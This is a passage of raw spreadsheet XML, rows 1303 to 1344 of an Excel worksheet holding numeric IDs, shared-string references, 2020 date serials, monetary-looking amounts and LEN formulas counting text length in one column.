    <row r="1303" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1303">
        <v>19896</v>
      </c>
      <c r="B1303">
        <v>423</v>
      </c>
      <c r="C1303" t="s">
        <v>167</v>
      </c>
      <c r="D1303" t="s">
        <v>10046</v>
      </c>
      <c r="E1303">
        <v>13</v>
      </c>
      <c r="F1303" t="s">
        <v>10309</v>
      </c>
      <c r="G1303" s="1">
        <v>43929</v>
      </c>
      <c r="H1303">
        <v>49888</v>
      </c>
      <c r="I1303" t="s">
        <v>10031</v>
      </c>
      <c r="K1303">
        <f>LEN(I1303)</f>
        <v>100</v>
      </c>
      <c r="L1303">
        <f>LEN(J1303)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1304" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1304">
        <v>20440</v>
      </c>
      <c r="B1304">
        <v>1407</v>
      </c>
      <c r="C1304" t="s">
        <v>2922</v>
      </c>
      <c r="D1304" t="s">
        <v>10716</v>
      </c>
      <c r="E1304">
        <v>11</v>
      </c>
      <c r="F1304" t="s">
        <v>2924</v>
      </c>
      <c r="G1304" s="1">
        <v>43935</v>
      </c>
      <c r="H1304">
        <v>50</v>
      </c>
      <c r="I1304" t="s">
        <v>10031</v>
      </c>
      <c r="K1304">
        <f>LEN(I1304)</f>
        <v>100</v>
      </c>
      <c r="L1304">
        <f>LEN(J1304)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1305" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1305">
        <v>20604</v>
      </c>
      <c r="B1305">
        <v>935</v>
      </c>
      <c r="C1305" t="s">
        <v>2886</v>
      </c>
      <c r="D1305" t="s">
        <v>10843</v>
      </c>
      <c r="E1305">
        <v>13</v>
      </c>
      <c r="F1305" t="s">
        <v>3318</v>
      </c>
      <c r="G1305" s="1">
        <v>44103</v>
      </c>
      <c r="H1305">
        <v>107000</v>
      </c>
      <c r="I1305" t="s">
        <v>10845</v>
      </c>
      <c r="K1305">
        <f>LEN(I1305)</f>
        <v>100</v>
      </c>
      <c r="L1305">
        <f>LEN(J1305)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1306" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1306">
        <v>20740</v>
      </c>
      <c r="B1306">
        <v>888</v>
      </c>
      <c r="C1306" t="s">
        <v>3000</v>
      </c>
      <c r="D1306" t="s">
        <v>10947</v>
      </c>
      <c r="E1306">
        <v>12</v>
      </c>
      <c r="F1306" t="s">
        <v>10952</v>
      </c>
      <c r="G1306" s="1">
        <v>43984</v>
      </c>
      <c r="H1306">
        <v>775</v>
      </c>
      <c r="I1306" t="s">
        <v>10031</v>
      </c>
      <c r="K1306">
        <f>LEN(I1306)</f>
        <v>100</v>
      </c>
      <c r="L1306">
        <f>LEN(J1306)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1307" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1307">
        <v>20741</v>
      </c>
      <c r="B1307">
        <v>888</v>
      </c>
      <c r="C1307" t="s">
        <v>3000</v>
      </c>
      <c r="D1307" t="s">
        <v>10947</v>
      </c>
      <c r="E1307">
        <v>12</v>
      </c>
      <c r="F1307" t="s">
        <v>2236</v>
      </c>
      <c r="G1307" s="1">
        <v>43984</v>
      </c>
      <c r="H1307">
        <v>75881</v>
      </c>
      <c r="I1307" t="s">
        <v>10031</v>
      </c>
      <c r="K1307">
        <f>LEN(I1307)</f>
        <v>100</v>
      </c>
      <c r="L1307">
        <f>LEN(J1307)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1308" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1308">
        <v>20856</v>
      </c>
      <c r="B1308">
        <v>2272</v>
      </c>
      <c r="C1308" t="s">
        <v>6047</v>
      </c>
      <c r="D1308" t="s">
        <v>11040</v>
      </c>
      <c r="E1308">
        <v>11</v>
      </c>
      <c r="F1308" t="s">
        <v>9438</v>
      </c>
      <c r="G1308" s="1">
        <v>44046</v>
      </c>
      <c r="H1308">
        <v>300000</v>
      </c>
      <c r="I1308" t="s">
        <v>11041</v>
      </c>
      <c r="K1308">
        <f>LEN(I1308)</f>
        <v>100</v>
      </c>
      <c r="L1308">
        <f>LEN(J1308)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1309" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1309">
        <v>20857</v>
      </c>
      <c r="B1309">
        <v>2272</v>
      </c>
      <c r="C1309" t="s">
        <v>6047</v>
      </c>
      <c r="D1309" t="s">
        <v>11040</v>
      </c>
      <c r="E1309">
        <v>11</v>
      </c>
      <c r="F1309" t="s">
        <v>2924</v>
      </c>
      <c r="G1309" s="1">
        <v>44046</v>
      </c>
      <c r="H1309">
        <v>450000</v>
      </c>
      <c r="I1309" t="s">
        <v>11041</v>
      </c>
      <c r="K1309">
        <f>LEN(I1309)</f>
        <v>100</v>
      </c>
      <c r="L1309">
        <f>LEN(J1309)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1310" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1310">
        <v>20858</v>
      </c>
      <c r="B1310">
        <v>2272</v>
      </c>
      <c r="C1310" t="s">
        <v>6047</v>
      </c>
      <c r="D1310" t="s">
        <v>11040</v>
      </c>
      <c r="E1310">
        <v>11</v>
      </c>
      <c r="F1310" t="s">
        <v>9561</v>
      </c>
      <c r="G1310" s="1">
        <v>44046</v>
      </c>
      <c r="H1310">
        <v>250000</v>
      </c>
      <c r="I1310" t="s">
        <v>11041</v>
      </c>
      <c r="K1310">
        <f>LEN(I1310)</f>
        <v>100</v>
      </c>
      <c r="L1310">
        <f>LEN(J1310)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1311" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1311">
        <v>20859</v>
      </c>
      <c r="B1311">
        <v>2272</v>
      </c>
      <c r="C1311" t="s">
        <v>6047</v>
      </c>
      <c r="D1311" t="s">
        <v>11040</v>
      </c>
      <c r="E1311">
        <v>11</v>
      </c>
      <c r="F1311" t="s">
        <v>9676</v>
      </c>
      <c r="G1311" s="1">
        <v>44046</v>
      </c>
      <c r="H1311">
        <v>100000</v>
      </c>
      <c r="I1311" t="s">
        <v>11041</v>
      </c>
      <c r="K1311">
        <f>LEN(I1311)</f>
        <v>100</v>
      </c>
      <c r="L1311">
        <f>LEN(J1311)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1312" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1312">
        <v>20860</v>
      </c>
      <c r="B1312">
        <v>2272</v>
      </c>
      <c r="C1312" t="s">
        <v>6047</v>
      </c>
      <c r="D1312" t="s">
        <v>11040</v>
      </c>
      <c r="E1312">
        <v>11</v>
      </c>
      <c r="F1312" t="s">
        <v>9435</v>
      </c>
      <c r="G1312" s="1">
        <v>44046</v>
      </c>
      <c r="H1312">
        <v>100000</v>
      </c>
      <c r="I1312" t="s">
        <v>11041</v>
      </c>
      <c r="K1312">
        <f>LEN(I1312)</f>
        <v>100</v>
      </c>
      <c r="L1312">
        <f>LEN(J1312)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1313" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1313">
        <v>20861</v>
      </c>
      <c r="B1313">
        <v>2272</v>
      </c>
      <c r="C1313" t="s">
        <v>6047</v>
      </c>
      <c r="D1313" t="s">
        <v>11040</v>
      </c>
      <c r="E1313">
        <v>11</v>
      </c>
      <c r="F1313" t="s">
        <v>9577</v>
      </c>
      <c r="G1313" s="1">
        <v>44046</v>
      </c>
      <c r="H1313">
        <v>50000</v>
      </c>
      <c r="I1313" t="s">
        <v>11041</v>
      </c>
      <c r="K1313">
        <f>LEN(I1313)</f>
        <v>100</v>
      </c>
      <c r="L1313">
        <f>LEN(J1313)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1314" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1314">
        <v>20862</v>
      </c>
      <c r="B1314">
        <v>2272</v>
      </c>
      <c r="C1314" t="s">
        <v>6047</v>
      </c>
      <c r="D1314" t="s">
        <v>11040</v>
      </c>
      <c r="E1314">
        <v>11</v>
      </c>
      <c r="F1314" t="s">
        <v>9595</v>
      </c>
      <c r="G1314" s="1">
        <v>44046</v>
      </c>
      <c r="H1314">
        <v>100000</v>
      </c>
      <c r="I1314" t="s">
        <v>11041</v>
      </c>
      <c r="K1314">
        <f>LEN(I1314)</f>
        <v>100</v>
      </c>
      <c r="L1314">
        <f>LEN(J1314)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1315" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1315">
        <v>21253</v>
      </c>
      <c r="B1315">
        <v>909</v>
      </c>
      <c r="C1315" t="s">
        <v>3179</v>
      </c>
      <c r="D1315" t="s">
        <v>11255</v>
      </c>
      <c r="E1315">
        <v>12</v>
      </c>
      <c r="F1315" t="s">
        <v>9610</v>
      </c>
      <c r="G1315" s="1">
        <v>44088</v>
      </c>
      <c r="H1315">
        <v>1500</v>
      </c>
      <c r="I1315" t="s">
        <v>10031</v>
      </c>
      <c r="K1315">
        <f>LEN(I1315)</f>
        <v>100</v>
      </c>
      <c r="L1315">
        <f>LEN(J1315)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1316" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1316">
        <v>21254</v>
      </c>
      <c r="B1316">
        <v>909</v>
      </c>
      <c r="C1316" t="s">
        <v>3179</v>
      </c>
      <c r="D1316" t="s">
        <v>11255</v>
      </c>
      <c r="E1316">
        <v>12</v>
      </c>
      <c r="F1316" t="s">
        <v>9925</v>
      </c>
      <c r="G1316" s="1">
        <v>44088</v>
      </c>
      <c r="H1316">
        <v>9000</v>
      </c>
      <c r="I1316" t="s">
        <v>10031</v>
      </c>
      <c r="K1316">
        <f>LEN(I1316)</f>
        <v>100</v>
      </c>
      <c r="L1316">
        <f>LEN(J1316)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1317" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1317">
        <v>21256</v>
      </c>
      <c r="B1317">
        <v>909</v>
      </c>
      <c r="C1317" t="s">
        <v>3179</v>
      </c>
      <c r="D1317" t="s">
        <v>11255</v>
      </c>
      <c r="E1317">
        <v>12</v>
      </c>
      <c r="F1317" t="s">
        <v>9460</v>
      </c>
      <c r="G1317" s="1">
        <v>44088</v>
      </c>
      <c r="H1317">
        <v>2000</v>
      </c>
      <c r="I1317" t="s">
        <v>10031</v>
      </c>
      <c r="K1317">
        <f>LEN(I1317)</f>
        <v>100</v>
      </c>
      <c r="L1317">
        <f>LEN(J1317)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1318" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1318">
        <v>21257</v>
      </c>
      <c r="B1318">
        <v>909</v>
      </c>
      <c r="C1318" t="s">
        <v>3179</v>
      </c>
      <c r="D1318" t="s">
        <v>11255</v>
      </c>
      <c r="E1318">
        <v>12</v>
      </c>
      <c r="F1318" t="s">
        <v>1746</v>
      </c>
      <c r="G1318" s="1">
        <v>44088</v>
      </c>
      <c r="H1318">
        <v>200</v>
      </c>
      <c r="I1318" t="s">
        <v>10031</v>
      </c>
      <c r="K1318">
        <f>LEN(I1318)</f>
        <v>100</v>
      </c>
      <c r="L1318">
        <f>LEN(J1318)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1319" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1319">
        <v>21258</v>
      </c>
      <c r="B1319">
        <v>909</v>
      </c>
      <c r="C1319" t="s">
        <v>3179</v>
      </c>
      <c r="D1319" t="s">
        <v>11255</v>
      </c>
      <c r="E1319">
        <v>12</v>
      </c>
      <c r="F1319" t="s">
        <v>9595</v>
      </c>
      <c r="G1319" s="1">
        <v>44088</v>
      </c>
      <c r="H1319">
        <v>2000</v>
      </c>
      <c r="I1319" t="s">
        <v>10031</v>
      </c>
      <c r="K1319">
        <f>LEN(I1319)</f>
        <v>100</v>
      </c>
      <c r="L1319">
        <f>LEN(J1319)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1320" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1320">
        <v>21259</v>
      </c>
      <c r="B1320">
        <v>909</v>
      </c>
      <c r="C1320" t="s">
        <v>3179</v>
      </c>
      <c r="D1320" t="s">
        <v>11255</v>
      </c>
      <c r="E1320">
        <v>12</v>
      </c>
      <c r="F1320" t="s">
        <v>9435</v>
      </c>
      <c r="G1320" s="1">
        <v>44088</v>
      </c>
      <c r="H1320">
        <v>1000</v>
      </c>
      <c r="I1320" t="s">
        <v>10031</v>
      </c>
      <c r="K1320">
        <f>LEN(I1320)</f>
        <v>100</v>
      </c>
      <c r="L1320">
        <f>LEN(J1320)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1321" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1321">
        <v>21260</v>
      </c>
      <c r="B1321">
        <v>909</v>
      </c>
      <c r="C1321" t="s">
        <v>3179</v>
      </c>
      <c r="D1321" t="s">
        <v>11255</v>
      </c>
      <c r="E1321">
        <v>12</v>
      </c>
      <c r="F1321" t="s">
        <v>11257</v>
      </c>
      <c r="G1321" s="1">
        <v>44088</v>
      </c>
      <c r="H1321">
        <v>15000</v>
      </c>
      <c r="I1321" t="s">
        <v>10031</v>
      </c>
      <c r="K1321">
        <f>LEN(I1321)</f>
        <v>100</v>
      </c>
      <c r="L1321">
        <f>LEN(J1321)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1322" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1322">
        <v>21261</v>
      </c>
      <c r="B1322">
        <v>909</v>
      </c>
      <c r="C1322" t="s">
        <v>3179</v>
      </c>
      <c r="D1322" t="s">
        <v>11255</v>
      </c>
      <c r="E1322">
        <v>12</v>
      </c>
      <c r="F1322" t="s">
        <v>7296</v>
      </c>
      <c r="G1322" s="1">
        <v>44088</v>
      </c>
      <c r="H1322">
        <v>30000</v>
      </c>
      <c r="I1322" t="s">
        <v>10031</v>
      </c>
      <c r="K1322">
        <f>LEN(I1322)</f>
        <v>100</v>
      </c>
      <c r="L1322">
        <f>LEN(J1322)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1323" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1323">
        <v>21262</v>
      </c>
      <c r="B1323">
        <v>909</v>
      </c>
      <c r="C1323" t="s">
        <v>3179</v>
      </c>
      <c r="D1323" t="s">
        <v>11255</v>
      </c>
      <c r="E1323">
        <v>12</v>
      </c>
      <c r="F1323" t="s">
        <v>11215</v>
      </c>
      <c r="G1323" s="1">
        <v>44088</v>
      </c>
      <c r="H1323">
        <v>200</v>
      </c>
      <c r="I1323" t="s">
        <v>10031</v>
      </c>
      <c r="K1323">
        <f>LEN(I1323)</f>
        <v>100</v>
      </c>
      <c r="L1323">
        <f>LEN(J1323)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1324" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1324">
        <v>21263</v>
      </c>
      <c r="B1324">
        <v>909</v>
      </c>
      <c r="C1324" t="s">
        <v>3179</v>
      </c>
      <c r="D1324" t="s">
        <v>11255</v>
      </c>
      <c r="E1324">
        <v>12</v>
      </c>
      <c r="F1324" t="s">
        <v>11258</v>
      </c>
      <c r="G1324" s="1">
        <v>44088</v>
      </c>
      <c r="H1324">
        <v>2500</v>
      </c>
      <c r="I1324" t="s">
        <v>10031</v>
      </c>
      <c r="K1324">
        <f>LEN(I1324)</f>
        <v>100</v>
      </c>
      <c r="L1324">
        <f>LEN(J1324)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1325" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1325">
        <v>21264</v>
      </c>
      <c r="B1325">
        <v>909</v>
      </c>
      <c r="C1325" t="s">
        <v>3179</v>
      </c>
      <c r="D1325" t="s">
        <v>11255</v>
      </c>
      <c r="E1325">
        <v>12</v>
      </c>
      <c r="F1325" t="s">
        <v>3814</v>
      </c>
      <c r="G1325" s="1">
        <v>44088</v>
      </c>
      <c r="H1325">
        <v>200</v>
      </c>
      <c r="I1325" t="s">
        <v>10031</v>
      </c>
      <c r="K1325">
        <f>LEN(I1325)</f>
        <v>100</v>
      </c>
      <c r="L1325">
        <f>LEN(J1325)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1326" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1326">
        <v>21265</v>
      </c>
      <c r="B1326">
        <v>909</v>
      </c>
      <c r="C1326" t="s">
        <v>3179</v>
      </c>
      <c r="D1326" t="s">
        <v>11255</v>
      </c>
      <c r="E1326">
        <v>12</v>
      </c>
      <c r="F1326" t="s">
        <v>9928</v>
      </c>
      <c r="G1326" s="1">
        <v>44088</v>
      </c>
      <c r="H1326">
        <v>200</v>
      </c>
      <c r="I1326" t="s">
        <v>10031</v>
      </c>
      <c r="K1326">
        <f>LEN(I1326)</f>
        <v>100</v>
      </c>
      <c r="L1326">
        <f>LEN(J1326)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1327" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1327">
        <v>21266</v>
      </c>
      <c r="B1327">
        <v>909</v>
      </c>
      <c r="C1327" t="s">
        <v>3179</v>
      </c>
      <c r="D1327" t="s">
        <v>11255</v>
      </c>
      <c r="E1327">
        <v>12</v>
      </c>
      <c r="F1327" t="s">
        <v>10304</v>
      </c>
      <c r="G1327" s="1">
        <v>44088</v>
      </c>
      <c r="H1327">
        <v>1000</v>
      </c>
      <c r="I1327" t="s">
        <v>10031</v>
      </c>
      <c r="K1327">
        <f>LEN(I1327)</f>
        <v>100</v>
      </c>
      <c r="L1327">
        <f>LEN(J1327)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1328" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1328">
        <v>21267</v>
      </c>
      <c r="B1328">
        <v>909</v>
      </c>
      <c r="C1328" t="s">
        <v>3179</v>
      </c>
      <c r="D1328" t="s">
        <v>11255</v>
      </c>
      <c r="E1328">
        <v>12</v>
      </c>
      <c r="F1328" t="s">
        <v>9577</v>
      </c>
      <c r="G1328" s="1">
        <v>44088</v>
      </c>
      <c r="H1328">
        <v>250</v>
      </c>
      <c r="I1328" t="s">
        <v>10031</v>
      </c>
      <c r="K1328">
        <f>LEN(I1328)</f>
        <v>100</v>
      </c>
      <c r="L1328">
        <f>LEN(J1328)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1329" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1329">
        <v>21268</v>
      </c>
      <c r="B1329">
        <v>909</v>
      </c>
      <c r="C1329" t="s">
        <v>3179</v>
      </c>
      <c r="D1329" t="s">
        <v>11255</v>
      </c>
      <c r="E1329">
        <v>12</v>
      </c>
      <c r="F1329" t="s">
        <v>11259</v>
      </c>
      <c r="G1329" s="1">
        <v>44088</v>
      </c>
      <c r="H1329">
        <v>500</v>
      </c>
      <c r="I1329" t="s">
        <v>10031</v>
      </c>
      <c r="K1329">
        <f>LEN(I1329)</f>
        <v>100</v>
      </c>
      <c r="L1329">
        <f>LEN(J1329)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1330" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1330">
        <v>19245</v>
      </c>
      <c r="B1330">
        <v>2318</v>
      </c>
      <c r="C1330" t="s">
        <v>4787</v>
      </c>
      <c r="D1330" t="s">
        <v>9864</v>
      </c>
      <c r="E1330">
        <v>15</v>
      </c>
      <c r="F1330" t="s">
        <v>9866</v>
      </c>
      <c r="G1330" s="1">
        <v>44090</v>
      </c>
      <c r="H1330">
        <v>60</v>
      </c>
      <c r="I1330" t="s">
        <v>9867</v>
      </c>
      <c r="K1330">
        <f>LEN(I1330)</f>
        <v>98</v>
      </c>
      <c r="L1330">
        <f>LEN(J1330)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1331" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1331">
        <v>20070</v>
      </c>
      <c r="B1331">
        <v>1957</v>
      </c>
      <c r="C1331" t="s">
        <v>5645</v>
      </c>
      <c r="D1331" t="s">
        <v>10455</v>
      </c>
      <c r="E1331">
        <v>15</v>
      </c>
      <c r="F1331" t="s">
        <v>5647</v>
      </c>
      <c r="G1331" s="1">
        <v>43893</v>
      </c>
      <c r="H1331">
        <v>8640</v>
      </c>
      <c r="I1331" t="s">
        <v>9867</v>
      </c>
      <c r="K1331">
        <f>LEN(I1331)</f>
        <v>98</v>
      </c>
      <c r="L1331">
        <f>LEN(J1331)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1332" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1332">
        <v>20518</v>
      </c>
      <c r="B1332">
        <v>2774</v>
      </c>
      <c r="C1332" t="s">
        <v>6922</v>
      </c>
      <c r="D1332" t="s">
        <v>10765</v>
      </c>
      <c r="E1332">
        <v>16</v>
      </c>
      <c r="F1332" t="s">
        <v>10766</v>
      </c>
      <c r="G1332" s="1">
        <v>44090</v>
      </c>
      <c r="H1332">
        <v>800000</v>
      </c>
      <c r="I1332" t="s">
        <v>10767</v>
      </c>
      <c r="K1332">
        <f>LEN(I1332)</f>
        <v>98</v>
      </c>
      <c r="L1332">
        <f>LEN(J1332)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1333" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1333">
        <v>20426</v>
      </c>
      <c r="B1333">
        <v>2088</v>
      </c>
      <c r="C1333" t="s">
        <v>5732</v>
      </c>
      <c r="D1333" t="s">
        <v>10698</v>
      </c>
      <c r="E1333">
        <v>24</v>
      </c>
      <c r="F1333" t="s">
        <v>10699</v>
      </c>
      <c r="G1333" s="1">
        <v>44040</v>
      </c>
      <c r="H1333">
        <v>0</v>
      </c>
      <c r="I1333" t="s">
        <v>10700</v>
      </c>
      <c r="K1333">
        <f>LEN(I1333)</f>
        <v>93</v>
      </c>
      <c r="L1333">
        <f>LEN(J1333)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1334" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1334">
        <v>20427</v>
      </c>
      <c r="B1334">
        <v>2088</v>
      </c>
      <c r="C1334" t="s">
        <v>5732</v>
      </c>
      <c r="D1334" t="s">
        <v>10698</v>
      </c>
      <c r="E1334">
        <v>24</v>
      </c>
      <c r="F1334" t="s">
        <v>10701</v>
      </c>
      <c r="G1334" s="1">
        <v>44040</v>
      </c>
      <c r="H1334">
        <v>0</v>
      </c>
      <c r="I1334" t="s">
        <v>10700</v>
      </c>
      <c r="K1334">
        <f>LEN(I1334)</f>
        <v>93</v>
      </c>
      <c r="L1334">
        <f>LEN(J1334)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1335" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1335">
        <v>19449</v>
      </c>
      <c r="B1335">
        <v>2573</v>
      </c>
      <c r="C1335" t="s">
        <v>5094</v>
      </c>
      <c r="D1335" t="s">
        <v>10047</v>
      </c>
      <c r="E1335">
        <v>12</v>
      </c>
      <c r="F1335" t="s">
        <v>9925</v>
      </c>
      <c r="G1335" s="1">
        <v>44103</v>
      </c>
      <c r="H1335">
        <v>25000</v>
      </c>
      <c r="I1335" t="s">
        <v>10051</v>
      </c>
      <c r="K1335">
        <f>LEN(I1335)</f>
        <v>89</v>
      </c>
      <c r="L1335">
        <f>LEN(J1335)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1336" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1336">
        <v>21234</v>
      </c>
      <c r="B1336">
        <v>2245</v>
      </c>
      <c r="C1336" t="s">
        <v>6132</v>
      </c>
      <c r="D1336" t="s">
        <v>9434</v>
      </c>
      <c r="E1336">
        <v>11</v>
      </c>
      <c r="F1336" t="s">
        <v>11229</v>
      </c>
      <c r="G1336" s="1">
        <v>44015</v>
      </c>
      <c r="H1336">
        <v>300000</v>
      </c>
      <c r="I1336" t="s">
        <v>11230</v>
      </c>
      <c r="K1336">
        <f>LEN(I1336)</f>
        <v>89</v>
      </c>
      <c r="L1336">
        <f>LEN(J1336)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1337" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1337">
        <v>19258</v>
      </c>
      <c r="B1337">
        <v>433</v>
      </c>
      <c r="C1337" t="s">
        <v>206</v>
      </c>
      <c r="D1337" t="s">
        <v>9878</v>
      </c>
      <c r="E1337">
        <v>16</v>
      </c>
      <c r="F1337" t="s">
        <v>9879</v>
      </c>
      <c r="G1337" s="1">
        <v>43929</v>
      </c>
      <c r="H1337">
        <v>20000</v>
      </c>
      <c r="I1337" t="s">
        <v>9880</v>
      </c>
      <c r="K1337">
        <f>LEN(I1337)</f>
        <v>86</v>
      </c>
      <c r="L1337">
        <f>LEN(J1337)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1338" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1338">
        <v>19261</v>
      </c>
      <c r="B1338">
        <v>433</v>
      </c>
      <c r="C1338" t="s">
        <v>206</v>
      </c>
      <c r="D1338" t="s">
        <v>9878</v>
      </c>
      <c r="E1338">
        <v>16</v>
      </c>
      <c r="F1338" t="s">
        <v>9437</v>
      </c>
      <c r="G1338" s="1">
        <v>43929</v>
      </c>
      <c r="H1338">
        <v>10000</v>
      </c>
      <c r="I1338" t="s">
        <v>9885</v>
      </c>
      <c r="K1338">
        <f>LEN(I1338)</f>
        <v>86</v>
      </c>
      <c r="L1338">
        <f>LEN(J1338)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1339" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1339">
        <v>20684</v>
      </c>
      <c r="B1339">
        <v>840</v>
      </c>
      <c r="C1339" t="s">
        <v>3030</v>
      </c>
      <c r="D1339" t="s">
        <v>10880</v>
      </c>
      <c r="E1339">
        <v>16</v>
      </c>
      <c r="F1339" t="s">
        <v>3341</v>
      </c>
      <c r="G1339" s="1">
        <v>44084</v>
      </c>
      <c r="H1339">
        <v>2400</v>
      </c>
      <c r="I1339" t="s">
        <v>10883</v>
      </c>
      <c r="K1339">
        <f>LEN(I1339)</f>
        <v>83</v>
      </c>
      <c r="L1339">
        <f>LEN(J1339)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1340" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1340">
        <v>21122</v>
      </c>
      <c r="B1340">
        <v>454</v>
      </c>
      <c r="C1340" t="s">
        <v>223</v>
      </c>
      <c r="D1340" t="s">
        <v>11154</v>
      </c>
      <c r="E1340">
        <v>15</v>
      </c>
      <c r="F1340" t="s">
        <v>11155</v>
      </c>
      <c r="G1340" s="1">
        <v>44055</v>
      </c>
      <c r="H1340">
        <v>800</v>
      </c>
      <c r="I1340" t="s">
        <v>11156</v>
      </c>
      <c r="K1340">
        <f>LEN(I1340)</f>
        <v>83</v>
      </c>
      <c r="L1340">
        <f>LEN(J1340)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1341" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1341">
        <v>21123</v>
      </c>
      <c r="B1341">
        <v>454</v>
      </c>
      <c r="C1341" t="s">
        <v>223</v>
      </c>
      <c r="D1341" t="s">
        <v>11154</v>
      </c>
      <c r="E1341">
        <v>15</v>
      </c>
      <c r="F1341" t="s">
        <v>11157</v>
      </c>
      <c r="G1341" s="1">
        <v>44055</v>
      </c>
      <c r="H1341">
        <v>800</v>
      </c>
      <c r="I1341" t="s">
        <v>11156</v>
      </c>
      <c r="K1341">
        <f>LEN(I1341)</f>
        <v>83</v>
      </c>
      <c r="L1341">
        <f>LEN(J1341)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1342" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1342">
        <v>17163</v>
      </c>
      <c r="B1342">
        <v>2080</v>
      </c>
      <c r="C1342" t="s">
        <v>6755</v>
      </c>
      <c r="D1342" t="s">
        <v>9703</v>
      </c>
      <c r="E1342">
        <v>16</v>
      </c>
      <c r="F1342" t="s">
        <v>9704</v>
      </c>
      <c r="G1342" s="1">
        <v>44034</v>
      </c>
      <c r="H1342">
        <v>78000</v>
      </c>
      <c r="I1342" t="s">
        <v>9705</v>
      </c>
      <c r="K1342">
        <f>LEN(I1342)</f>
        <v>81</v>
      </c>
      <c r="L1342">
        <f>LEN(J1342)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1343" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1343">
        <v>21102</v>
      </c>
      <c r="B1343">
        <v>1713</v>
      </c>
      <c r="C1343" t="s">
        <v>2878</v>
      </c>
      <c r="D1343" t="s">
        <v>11141</v>
      </c>
      <c r="E1343">
        <v>16</v>
      </c>
      <c r="F1343" t="s">
        <v>11142</v>
      </c>
      <c r="G1343" s="1">
        <v>44081</v>
      </c>
      <c r="H1343">
        <v>1000</v>
      </c>
      <c r="I1343" t="s">
        <v>11143</v>
      </c>
      <c r="K1343">
        <f>LEN(I1343)</f>
        <v>77</v>
      </c>
      <c r="L1343">
        <f>LEN(J1343)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1344" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1344">
        <v>21103</v>
      </c>
      <c r="B1344">
        <v>1713</v>
      </c>
      <c r="C1344" t="s">
        <v>2878</v>
      </c>
      <c r="D1344" t="s">
        <v>11141</v>
      </c>
      <c r="E1344">
        <v>16</v>
      </c>
      <c r="F1344" t="s">
        <v>10250</v>
      </c>
      <c r="G1344" s="1">
        <v>44081</v>
      </c>
      <c r="H1344">
        <v>1000</v>
      </c>
      <c r="I1344" t="s">
        <v>11143</v>
      </c>
